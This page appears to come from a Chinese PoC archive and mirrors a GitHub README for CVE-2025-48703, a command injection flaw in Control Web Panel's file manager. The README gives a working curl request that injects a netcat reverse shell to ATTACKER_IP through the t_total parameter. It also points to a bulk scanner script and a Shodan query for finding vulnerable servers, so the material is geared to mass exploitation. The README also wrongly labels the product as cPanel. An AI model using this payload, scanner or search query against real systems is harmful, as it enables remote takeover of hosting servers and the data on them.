目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2025-48703 PoC — Control Web Panel 操作系统命令注入漏洞

来源
https://github.com/Skynoxk/CVE-2025-48703
关联漏洞
标题:Control Web Panel 操作系统命令注入漏洞 (CVE-2025-48703)
Description:Control Web Panel是一款Linux虚拟主机控制面板。 Control Web Panel 0.9.8.1205之前版本存在操作系统命令注入漏洞,该漏洞源于filemanager changePerm请求中t_total参数包含shell元字符,可能导致远程代码执行。
Description
Remote Code execution in CentOS web panel
介绍
# 🛡️ CVE-2025-48703 - Remote Code Execution (RCE) in cPanel File Manager

## 📌 Description

**CVE-2025-48703** is a Remote Code Execution (RCE) vulnerability in the `filemanager` module of a web hosting control panel (e.g., cPanel). It occurs due to **unsanitized input handling** in the `acc=changePerm` function, which allows an attacker to inject and execute arbitrary system commands using the `t_total` parameter.

---

## 🧨 Impact

This vulnerability allows attackers to:

- Execute arbitrary commands on the target server.
- Establish a reverse shell for persistent access.
- Potentially escalate privileges or move laterally.

> ⚠️ This attack can be performed with minimal authentication, or in some configurations, unauthenticated access.

---

## 🚀 Proof-of-Concept (PoC)

### ✅ Reverse Shell Command

```bash
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
  --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'
```
## Scanner usage
```bash
python3 Scanner.py  #Make sure targets.txt is in the same dir
```
## Shodan search 
```text
Server: cwpsrv
```
Reference: https://fenrisk.com/rce-centos-webpanel
文件快照

 [4.0K]  /data/pocs/60b5b1b3ee205f0791e4c4a4dfa70c6f720296ba
├── [1.2K]  README.md
├── [1.4K]  Scanner.py
└── [   0]  target.txt

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。